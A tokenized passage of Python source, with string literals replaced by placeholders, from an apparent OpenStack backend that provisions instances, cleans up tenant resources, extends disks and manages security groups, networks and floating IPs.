<EOL> '<STR_LIT:id>' : instance . id , <EOL> '<STR_LIT:name>' : instance . name or instance . id , <EOL> '<STR_LIT>' : instance . created , <EOL> '<STR_LIT:status>' : instance . status , <EOL> } for instance in instances <EOL> if instance . id not in cur_instances and <EOL> self . _get_instance_state ( instance ) != models . Instance . States . ERRED ] <EOL> def get_managed_resources ( self ) : <EOL> try : <EOL> ids = [ instance . id for instance in self . nova_client . servers . list ( ) ] <EOL> return models . Instance . objects . filter ( backend_id__in = ids ) <EOL> except nova_exceptions . ClientException : <EOL> return [ ] <EOL> def provision_instance ( self , instance , backend_flavor_id = None , backend_image_id = None , <EOL> system_volume_id = None , data_volume_id = None , <EOL> skip_external_ip_assignment = False , public_key = None ) : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> nova = self . nova_client <EOL> cinder = self . cinder_client <EOL> neutron = self . neutron_client <EOL> backend_flavor = nova . flavors . get ( backend_flavor_id ) <EOL> service_project_link = instance . service_project_link <EOL> tenant = service_project_link . tenant <EOL> try : <EOL> neutron . show_network ( service_project_link . internal_network_id ) <EOL> except neutron_exceptions . NeutronClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> service_project_link . internal_network_id ) <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> if not skip_external_ip_assignment : <EOL> if not service_project_link . floating_ips . filter ( status = '<STR_LIT>' ) . exists ( ) : <EOL> self . allocate_floating_ip_address ( tenant ) <EOL> floating_ip = service_project_link . floating_ips . filter ( status = '<STR_LIT>' ) . first ( ) <EOL> instance . external_ips = floating_ip . address <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> if instance . key_name : <EOL> backend_public_key = self . get_or_create_ssh_key_for_tenant ( <EOL> tenant , instance . key_name , instance . key_fingerprint , public_key ) <EOL> else : <EOL> backend_public_key = None <EOL> if not system_volume_id : <EOL> system_volume_name = '<STR_LIT>' . format ( instance . name ) <EOL> logger . info ( '<STR_LIT>' , system_volume_name , instance . uuid ) <EOL> system_volume = cinder . volumes . create ( <EOL> size = self . mb2gb ( instance . system_volume_size ) , <EOL> display_name = system_volume_name , <EOL> display_description = '<STR_LIT>' , <EOL> imageRef = backend_image_id ) <EOL> system_volume_id = system_volume . id <EOL> if not data_volume_id : <EOL> data_volume_name = '<STR_LIT>' . format ( instance . name ) <EOL> logger . info ( '<STR_LIT>' , data_volume_name , instance . uuid ) <EOL> data_volume = cinder . volumes . create ( <EOL> size = self . mb2gb ( instance . data_volume_size ) , <EOL> display_name = data_volume_name , <EOL> display_description = '<STR_LIT>' ) <EOL> data_volume_id = data_volume . id <EOL> if not self . _wait_for_volume_status ( system_volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> instance . uuid , system_volume_id ) <EOL> raise OpenStackBackendError ( "<STR_LIT>" % instance . uuid ) <EOL> if not self . _wait_for_volume_status ( data_volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> instance . uuid , data_volume_id ) <EOL> raise OpenStackBackendError ( "<STR_LIT>" % instance . uuid ) <EOL> security_group_ids = instance . security_groups . values_list ( '<STR_LIT>' , flat = True ) <EOL> server_create_parameters = dict ( <EOL> name = instance . name , <EOL> image = None , <EOL> flavor = backend_flavor , <EOL> block_device_mapping_v2 = [ <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : system_volume_id , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : data_volume_id , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> ] , <EOL> nics = [ <EOL> { '<STR_LIT>' : service_project_link . internal_network_id } <EOL> ] , <EOL> key_name = backend_public_key . name if backend_public_key is not None else None , <EOL> security_groups = security_group_ids , <EOL> ) <EOL> availability_zone = service_project_link . availability_zone <EOL> if availability_zone : <EOL> server_create_parameters [ '<STR_LIT>' ] = availability_zone <EOL> if instance . user_data : <EOL> server_create_parameters [ '<STR_LIT>' ] = instance . user_data <EOL> server = nova . servers . create ( ** server_create_parameters ) <EOL> instance . backend_id = server . id <EOL> instance . system_volume_id = system_volume_id <EOL> instance . data_volume_id = data_volume_id <EOL> instance . save ( ) <EOL> if not self . _wait_for_instance_status ( server . id , nova , '<STR_LIT>' ) : <EOL> logger . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> instance . uuid ) <EOL> raise OpenStackBackendError ( "<STR_LIT>" % instance . uuid ) <EOL> logger . debug ( "<STR_LIT>" , instance . uuid ) <EOL> try : <EOL> server = nova . servers . get ( server . id ) <EOL> fixed_address = server . addresses . values ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> except ( nova_exceptions . ClientException , KeyError , IndexError ) : <EOL> logger . exception ( <EOL> "<STR_LIT>" , instance . uuid ) <EOL> else : <EOL> instance . internal_ips = fixed_address <EOL> instance . save ( ) <EOL> logger . info ( <EOL> "<STR_LIT>" , instance . uuid ) <EOL> self . push_floating_ip_to_instance ( instance , server ) <EOL> backend_security_groups = server . list_security_group ( ) <EOL> for bsg in backend_security_groups : <EOL> if instance . security_groups . filter ( security_group__name = bsg . name ) . exists ( ) : <EOL> continue <EOL> try : <EOL> security_group = service_project_link . security_groups . get ( name = bsg . name ) <EOL> except models . SecurityGroup . DoesNotExist : <EOL> logger . error ( <EOL> '<STR_LIT>' % <EOL> ( service_project_link , service_project_link . pk , bsg . name , instance , instance . pk ) <EOL> ) <EOL> else : <EOL> instance . security_groups . create ( security_group = security_group ) <EOL> except ( glance_exceptions . ClientException , <EOL> cinder_exceptions . ClientException , <EOL> nova_exceptions . ClientException , <EOL> neutron_exceptions . NeutronClientException ) as e : <EOL> logger . exception ( "<STR_LIT>" , instance . uuid ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( "<STR_LIT>" , instance . uuid ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def pull_tenant_instances ( self , tenant ) : <EOL> spl = tenant . service_project_link <EOL> States = models . Instance . States <EOL> for instance in spl . instances . filter ( state__in = [ States . ONLINE , States . OFFLINE ] ) : <EOL> try : <EOL> instance_data = self . get_instance ( instance . backend_id ) . nc_model_data <EOL> except OpenStackBackendError as e : <EOL> logger . error ( '<STR_LIT>' , instance , instance . pk , e ) <EOL> else : <EOL> instance . ram = instance_data [ '<STR_LIT>' ] <EOL> instance . cores = instance_data [ '<STR_LIT>' ] <EOL> instance . disk = instance_data [ '<STR_LIT>' ] <EOL> instance . system_volume_size = instance_data [ '<STR_LIT>' ] <EOL> instance . data_volume_size = instance_data [ '<STR_LIT>' ] <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , instance , instance . pk ) <EOL> def cleanup ( self , dryrun = True ) : <EOL> if not self . tenant_id : <EOL> logger . info ( "<STR_LIT>" % self ) <EOL> return <EOL> neutron = self . neutron_admin_client <EOL> floatingips = neutron . list_floatingips ( tenant_id = self . tenant_id ) <EOL> if floatingips : <EOL> for floatingip in floatingips [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , floatingip [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_floatingip ( floatingip [ '<STR_LIT:id>' ] ) <EOL> except neutron_exceptions . NotFound : <EOL> logger . debug ( "<STR_LIT>" , floatingip [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> ports = neutron . list_ports ( tenant_id = self . tenant_id ) <EOL> if ports : <EOL> for port in ports [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , port [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . remove_interface_router ( port [ '<STR_LIT>' ] , { '<STR_LIT>' : port [ '<STR_LIT:id>' ] } ) <EOL> except neutron_exceptions . NotFound : <EOL> logger . debug ( "<STR_LIT>" , port [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> routers = neutron . list_routers ( tenant_id = self . tenant_id ) <EOL> if routers : <EOL> for router in routers [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , router [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_router ( router [ '<STR_LIT:id>' ] ) <EOL> except neutron_exceptions . NotFound : <EOL> logger . debug ( "<STR_LIT>" , router [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> networks = neutron . list_networks ( tenant_id = self . tenant_id ) <EOL> if networks : <EOL> for network in networks [ '<STR_LIT>' ] : <EOL> for subnet in network [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , subnet , self . tenant_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_subnet ( subnet ) <EOL> except neutron_exceptions . NotFound : <EOL> logger . info ( "<STR_LIT>" , subnet , self . tenant_id ) <EOL> logger . info ( "<STR_LIT>" , network [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_network ( network [ '<STR_LIT:id>' ] ) <EOL> except neutron_exceptions . NotFound : <EOL> logger . debug ( "<STR_LIT>" , network [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> nova = self . nova_client <EOL> sgroups = nova . security_groups . list ( ) <EOL> for sgroup in sgroups : <EOL> logger . info ( "<STR_LIT>" , sgroup . id , self . tenant_id ) <EOL> if not dryrun : <EOL> sgroup . delete ( ) <EOL> servers = nova . servers . list ( ) <EOL> for server in servers : <EOL> logger . info ( "<STR_LIT>" , server . id , self . tenant_id ) <EOL> if not dryrun : <EOL> server . delete ( ) <EOL> cinder = self . cinder_client <EOL> snapshots = cinder . volume_snapshots . list ( ) <EOL> for snapshot in snapshots : <EOL> logger . info ( "<STR_LIT>" , snapshot . id , self . tenant_id ) <EOL> if not dryrun : <EOL> snapshot . delete ( ) <EOL> volumes = cinder . volumes . list ( ) <EOL> for volume in volumes : <EOL> logger . info ( "<STR_LIT>" , volume . id , self . tenant_id ) <EOL> if not dryrun : <EOL> volume . delete ( ) <EOL> keystone = self . keystone_admin_client <EOL> logger . info ( "<STR_LIT>" , self . tenant_id ) <EOL> if not dryrun : <EOL> keystone . tenants . delete ( self . tenant_id ) <EOL> @ log_backend_action ( ) <EOL> def cleanup_tenant ( self , tenant , dryrun = True ) : <EOL> if not tenant . backend_id : <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> neutron = self . neutron_admin_client <EOL> floatingips = neutron . list_floatingips ( tenant_id = tenant . backend_id ) <EOL> if floatingips : <EOL> for floatingip in floatingips [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , floatingip [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_floatingip ( floatingip [ '<STR_LIT:id>' ] ) <EOL> except ( neutron_exceptions . NotFound , keystone_exceptions . ClientException ) : <EOL> logger . debug ( "<STR_LIT>" , floatingip [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> ports = neutron . list_ports ( tenant_id = tenant . backend_id ) <EOL> if ports : <EOL> for port in ports [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , port [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . remove_interface_router ( port [ '<STR_LIT>' ] , { '<STR_LIT>' : port [ '<STR_LIT:id>' ] } ) <EOL> except ( neutron_exceptions . NotFound , keystone_exceptions . ClientException ) : <EOL> logger . debug ( "<STR_LIT>" , port [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> routers = neutron . list_routers ( tenant_id = tenant . backend_id ) <EOL> if routers : <EOL> for router in routers [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , router [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_router ( router [ '<STR_LIT:id>' ] ) <EOL> except ( neutron_exceptions . NotFound , keystone_exceptions . ClientException ) : <EOL> logger . debug ( "<STR_LIT>" , router [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> networks = neutron . list_networks ( tenant_id = tenant . backend_id ) <EOL> if networks : <EOL> for network in networks [ '<STR_LIT>' ] : <EOL> for subnet in network [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , subnet , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_subnet ( subnet ) <EOL> except ( neutron_exceptions . NotFound , keystone_exceptions . ClientException ) : <EOL> logger . info ( "<STR_LIT>" , subnet , tenant . backend_id ) <EOL> logger . info ( "<STR_LIT>" , network [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_network ( network [ '<STR_LIT:id>' ] ) <EOL> except ( neutron_exceptions . NotFound , keystone_exceptions . ClientException ) : <EOL> logger . debug ( "<STR_LIT>" , network [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> nova = self . nova_client <EOL> sgroups = nova . security_groups . list ( ) <EOL> for sgroup in sgroups : <EOL> logger . info ( "<STR_LIT>" , sgroup . id , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> sgroup . delete ( ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) : <EOL> logger . debug ( "<STR_LIT>" , sgroup , tenant . backend_id ) <EOL> servers = nova . servers . list ( ) <EOL> for server in servers : <EOL> logger . info ( "<STR_LIT>" , server . id , tenant . backend_id ) <EOL> if not dryrun : <EOL> server . delete ( ) <EOL> cinder = self . cinder_client <EOL> snapshots = cinder . volume_snapshots . list ( ) <EOL> for snapshot in snapshots : <EOL> logger . info ( "<STR_LIT>" , snapshot . id , tenant . backend_id ) <EOL> if not dryrun : <EOL> snapshot . delete ( ) <EOL> volumes = cinder . volumes . list ( ) <EOL> for volume in volumes : <EOL> logger . info ( "<STR_LIT>" , volume . id , tenant . backend_id ) <EOL> if not dryrun : <EOL> volume . delete ( ) <EOL> keystone = self . keystone_client <EOL> try : <EOL> user = keystone . users . find ( name = tenant . user_username ) <EOL> logger . info ( '<STR_LIT>' , user . name , tenant . backend_id ) <EOL> if not dryrun : <EOL> user . delete ( ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . error ( '<STR_LIT>' , tenant . user_username , tenant . backend_id , e ) <EOL> keystone = self . keystone_admin_client <EOL> logger . info ( "<STR_LIT>" , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> keystone . tenants . delete ( tenant . backend_id ) <EOL> except keystone_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> def cleanup_instance ( self , backend_id = None , external_ips = None , internal_ips = None , <EOL> system_volume_id = None , data_volume_id = None ) : <EOL> nova = self . nova_client <EOL> nova . servers . delete ( backend_id ) <EOL> cinder = self . cinder_client <EOL> cinder . volumes . delete ( system_volume_id ) <EOL> cinder . volumes . delete ( data_volume_id ) <EOL> def extend_disk ( self , instance ) : <EOL> nova = self . nova_client <EOL> cinder = self . cinder_client <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> volume = cinder . volumes . get ( instance . data_volume_id ) <EOL> server_id = instance . backend_id <EOL> volume_id = volume . id <EOL> new_core_size = instance . data_volume_size <EOL> old_core_size = self . gb2mb ( volume . size ) <EOL> new_backend_size = self . mb2gb ( new_core_size ) <EOL> new_core_size_gib = int ( round ( new_core_size / <NUM_LIT> ) ) <EOL> if old_core_size == new_core_size : <EOL> logger . info ( '<STR_LIT>' , <EOL> volume_id , new_core_size ) <EOL> return <EOL> elif old_core_size > new_core_size : <EOL> logger . warning ( '<STR_LIT>' , <EOL> volume_id , new_core_size , old_core_size ) <EOL> event_logger . openstack_volume . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } <EOL> ) <EOL> return <EOL> nova . volumes . delete_server_volume ( server_id , volume_id ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> volume_id , instance . uuid , <EOL> ) <EOL> raise OpenStackBackendError ( <EOL> '<STR_LIT>' % ( volume_id , instance . uuid ) ) <EOL> try : <EOL> self . _extend_volume ( cinder , volume , new_backend_size ) <EOL> storage_delta = new_core_size - old_core_size <EOL> instance . service_project_link . add_quota_usage ( '<STR_LIT>' , storage_delta ) <EOL> except cinder_exceptions . OverLimit as e : <EOL> logger . warning ( <EOL> '<STR_LIT>' , <EOL> volume . id , <EOL> ) <EOL> event_logger . openstack_volume . error ( <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } , <EOL> ) <EOL> instance . data_volume_size = old_core_size <EOL> instance . save ( ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> finally : <EOL> nova . volumes . create_server_volume ( server_id , volume_id , None ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> volume_id , instance . uuid , <EOL> ) <EOL> raise OpenStackBackendError ( <EOL> '<STR_LIT>' % ( volume_id , instance . uuid ) ) <EOL> except cinder_exceptions . OverLimit : <EOL> pass <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . openstack_volume . info ( <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance , '<STR_LIT>' : new_core_size_gib } , <EOL> ) <EOL> def _push_security_group_rules ( self , security_group ) : <EOL> """<STR_LIT>""" <EOL> nova = self . nova_client <EOL> backend_security_group = nova . security_groups . get ( group_id = security_group . backend_id ) <EOL> backend_rules = { <EOL> rule [ '<STR_LIT:id>' ] : self . _normalize_security_group_rule ( rule ) <EOL> for rule in backend_security_group . rules <EOL> } <EOL> nonexistent_rules = [ ] <EOL> unsynchronized_rules = [ ] <EOL> extra_rule_ids = backend_rules . keys ( ) <EOL> for nc_rule in security_group . rules . all ( ) : <EOL> if nc_rule . backend_id not in backend_rules : <EOL> nonexistent_rules . append ( nc_rule ) <EOL> else : <EOL> backend_rule = backend_rules [ nc_rule . backend_id ] <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> unsynchronized_rules . append ( nc_rule ) <EOL> extra_rule_ids . remove ( nc_rule . backend_id ) <EOL> for backend_rule_id in extra_rule_ids : <EOL> logger . debug ( '<STR_LIT>' , backend_rule_id ) <EOL> try : <EOL> nova . security_group_rules . delete ( backend_rule_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> backend_rule_id , security_group ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , backend_rule_id ) <EOL> for nc_rule in unsynchronized_rules : <EOL> logger . debug ( '<STR_LIT>' , nc_rule . backend_id ) <EOL> try : <EOL> nova . security_group_rules . delete ( nc_rule . backend_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> nc_rule . backend_id , security_group ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> nc_rule . backend_id ) <EOL> for nc_rule in unsynchronized_rules + nonexistent_rules : <EOL> logger . debug ( '<STR_LIT>' , nc_rule . id ) <EOL> try : <EOL> if nc_rule . protocol == '<STR_LIT>' : <EOL> nc_rule_protocol = None <EOL> else : <EOL> nc_rule_protocol = nc_rule . protocol <EOL> nova . security_group_rules . create ( <EOL> parent_group_id = security_group . backend_id , <EOL> ip_protocol = nc_rule_protocol , <EOL> from_port = nc_rule . from_port , <EOL> to_port = nc_rule . to_port , <EOL> cidr = nc_rule . cidr , <EOL> ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , <EOL> nc_rule , security_group ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , nc_rule . id ) <EOL> @ log_backend_action ( ) <EOL> def create_security_group ( self , security_group ) : <EOL> nova = self . nova_client <EOL> try : <EOL> backend_security_group = nova . security_groups . create ( name = security_group . name , description = '<STR_LIT>' ) <EOL> security_group . backend_id = backend_security_group . id <EOL> security_group . save ( ) <EOL> self . _push_security_group_rules ( security_group ) <EOL> except nova_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( ) <EOL> def delete_security_group ( self , security_group ) : <EOL> nova = self . nova_client <EOL> try : <EOL> nova . security_groups . delete ( security_group . backend_id ) <EOL> except nova_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( ) <EOL> def update_security_group ( self , security_group ) : <EOL> nova = self . nova_client <EOL> try : <EOL> backend_security_group = nova . security_groups . find ( id = security_group . backend_id ) <EOL> if backend_security_group . name != security_group . name : <EOL> nova . security_groups . update ( <EOL> backend_security_group , name = security_group . name , description = '<STR_LIT>' ) <EOL> self . _push_security_group_rules ( security_group ) <EOL> except nova_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def create_external_network ( self , tenant , neutron , network_ip , network_prefix , <EOL> vlan_id = None , vxlan_id = None , ips_count = None ) : <EOL> service_project_link = tenant . service_project_link <EOL> if tenant . external_network_id : <EOL> self . connect_tenant_to_external_network ( tenant , tenant . external_network_id ) <EOL> neutron = self . neutron_admin_client <EOL> network_name = '<STR_LIT>' . format ( uuid . uuid4 ( ) . hex ) <EOL> network = { <EOL> '<STR_LIT:name>' : network_name , <EOL> '<STR_LIT>' : service_project_link . tenant_id , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> if vlan_id : <EOL> network [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> network [ '<STR_LIT>' ] = vlan_id <EOL> elif vxlan_id : <EOL> network [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> network [ '<STR_LIT>' ] = vxlan_id <EOL> else : <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> create_response = neutron . create_network ( { '<STR_LIT>' : [ network ] } ) <EOL> network_id = create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> logger . info ( '<STR_LIT>' , network_name ) <EOL> tenant . external_network_id = network_id <EOL> tenant . save ( update_fields = [ '<STR_LIT>' ] ) <EOL> subnet_name = '<STR_LIT>' . format ( network_name ) <EOL> cidr = '<STR_LIT>' . format ( network_ip , network_prefix ) <EOL> subnet_data = { <EOL> '<STR_LIT>' : service_project_link . external_network_id , <EOL> '<STR_LIT>' : service_project_link . tenant_id , <EOL> '<STR_LIT>' : cidr , <EOL> '<STR_LIT:name>' : subnet_name , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> create_response = neutron . create_subnet ( { '<STR_LIT>' : [ subnet_data ] } ) <EOL> logger . info ( '<STR_LIT>' , subnet_name ) <EOL> self . get_or_create_router ( network_name , create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> floating_ip = { <EOL> '<STR_LIT>' : service_project_link . external_network_id , <EOL> } <EOL> if vlan_id is not None and ips_count is not None : <EOL> for i in range ( ips_count ) : <EOL> ip = neutron . create_floatingip ( { '<STR_LIT>' : floating_ip } ) [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' , <EOL> ip [ '<STR_LIT>' ] , network_name ) <EOL> return service_project_link . external_network_id <EOL> def detect_external_network ( self , tenant ) : <EOL> neutron = self . neutron_admin_client <EOL> routers = neutron . list_routers ( tenant_id = tenant . backend_id ) [ '<STR_LIT>' ] <EOL> if bool ( routers ) : <EOL> router = routers [ <NUM_LIT:0> ] <EOL> else : <EOL> logger . warning ( '<STR_LIT>' , tenant , tenant . pk ) <EOL> return <EOL> ext_gw = router . get ( '<STR_LIT>' , { } ) <EOL> if '<STR_LIT>' in ext_gw : <EOL> tenant . external_network_id = ext_gw [ '<STR_LIT>' ] <EOL> tenant . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> ext_gw [ '<STR_LIT>' ] , tenant , tenant . pk ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def delete_external_network ( self , tenant ) : <EOL> neutron = self . neutron_admin_client <EOL> try : <EOL> floating_ips = neutron . list_floatingips ( <EOL> floating_network_id = tenant . external_network_id ) [ '<STR_LIT>' ] <EOL> for ip in floating_ips : <EOL> neutron . delete_floatingip ( ip [ '<STR_LIT:id>' ] ) <EOL> logger . info ( '<STR_LIT>' , ip [ '<STR_LIT:id>' ] ) <EOL> ports = neutron . list_ports ( network_id = tenant . external_network_id ) [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> neutron . remove_interface_router ( port [ '<STR_LIT>' ] , { '<STR_LIT>' : port [ '<STR_LIT:id>' ] } ) <EOL> logger . info ( '<STR_LIT>' , port [ '<STR_LIT:id>' ] ) <EOL> subnets = neutron . list_subnets ( network_id = tenant . external_network_id ) [ '<STR_LIT>' ] <EOL> for subnet in subnets : <EOL> neutron . delete_subnet ( subnet [ '<STR_LIT:id>' ] ) <EOL> logger . info ( '<STR_LIT>' , subnet [ '<STR_LIT:id>' ] ) <EOL> neutron . delete_network ( tenant . external_network_id ) <EOL> logger . info ( '<STR_LIT>' , tenant . external_network_id ) <EOL> except ( neutron_exceptions . NeutronClientException , <EOL> keystone_exceptions . ClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> tenant . external_network_id = '<STR_LIT>' <EOL> tenant . save ( ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def create_internal_network ( self , tenant ) : <EOL> neutron = self . neutron_admin_client <EOL> network_name = '<STR_LIT>' . format ( tenant . name ) <EOL> try : <EOL> network = { <EOL> '<STR_LIT:name>' : network_name , <EOL> '<STR_LIT>' : self . tenant_id , <EOL> } <EOL> create_response = neutron . create_network ( { '<STR_LIT>' : [ network ] } ) <EOL> internal_network_id = create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> subnet_name = '<STR_LIT>' . format ( network_name ) <EOL> logger . info ( '<STR_LIT>' , subnet_name , tenant . name , tenant . pk ) <EOL> subnet_data = { <EOL> '<STR_LIT>' : internal_network_id , <EOL> '<STR_LIT>' : tenant . backend_id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:start>' : '<STR_LIT>' , <EOL> '<STR_LIT:end>' : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT:name>' : subnet_name , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> create_response = neutron . create_subnet ( { '<STR_LIT>' : [ subnet_data ] } ) <EOL> self . get_or_create_router ( network_name , create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> except ( keystone_exceptions . ClientException , neutron_exceptions . NeutronException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> tenant . internal_network_id = internal_network_id <EOL> tenant . save ( update_fields = [ '<STR_LIT>' ] ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def allocate_floating_ip_address ( self , tenant ) : <EOL> neutron = self . neutron_admin_client <EOL> try : <EOL> ip_address = neutron . create_floatingip ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : tenant . external_network_id , <EOL> '<STR_LIT>' : tenant . backend_id , <EOL> } <EOL> } ) [ '<STR_LIT>' ] <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> tenant . service_project_link . floating_ips . create ( <EOL> status = '<STR_LIT>' , <EOL> address = ip_address [ '<STR_LIT>' ] , <EOL> backend_id = ip_address [ '<STR_LIT:id>' ] , <EOL> backend_network_id = ip_address [ '<STR_LIT>' ] <EOL> ) <EOL> def assign_floating_ip_to_instance ( self , instance , floating_ip ) : <EOL> nova = self . nova_admin_client <EOL> nova . servers . add_floating_ip ( server = instance . backend_id , address = floating_ip . address ) <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( ) <EOL> instance . external_ips = floating_ip . address <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> floating_ip . address , instance . uuid ) <EOL> def push_floating_ip_to_instance ( self , instance , server ) : <EOL> if not instance . external_ips or not instance . internal_ips : <EOL> return <EOL> logger . debug ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> service_project_link = instance . service_project_link <EOL> try : <EOL> floating_ip = 